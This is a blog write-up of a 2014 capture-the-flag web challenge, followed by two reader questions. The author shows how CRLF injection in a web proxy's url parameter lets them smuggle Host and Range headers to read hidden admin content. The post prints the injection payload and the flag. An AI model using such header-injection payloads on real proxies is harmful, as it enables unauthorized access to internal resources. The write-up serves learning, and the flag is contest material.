A disturbing lack of taste. Just another WordPress site


Codegate CTF Preliminary 2014 – Web Proxy Writeup

In this task a web proxy is given:

It has a GET parameter "url":

It prints the headers + part of the body. We can easly enter the admin page with:

but since the body isn't printed we can't see all the response. After a bit of testing it pointed out that a CRLF injection was possible so we can split the body with Range: header.


Since it wants Host header to be "hackme" lets do it: HTTP/1.0%0D%0AHost:%20hackme%0D%0ARange:%20bytes=88-127%0D%0AConnection: close%0d%0a%0D%0A

Flag: WH0_IS_SnUS_bI1G_F4N


Comments (5) Trackbacks (0)
  1. Hello, i dont understand about HTTP/1.0, host:localhost, range=88-127, connection:close.
    Can you tell me what is this. I tried to hack it via LFI, but it couldn’t show anything.
    P/s: sorry for my english, i’m a beginner.

  2. How do you know the web proxy server agree the website consistent with specified HTTP header “range: bytes=” ?

Leave a comment

No trackbacks yet.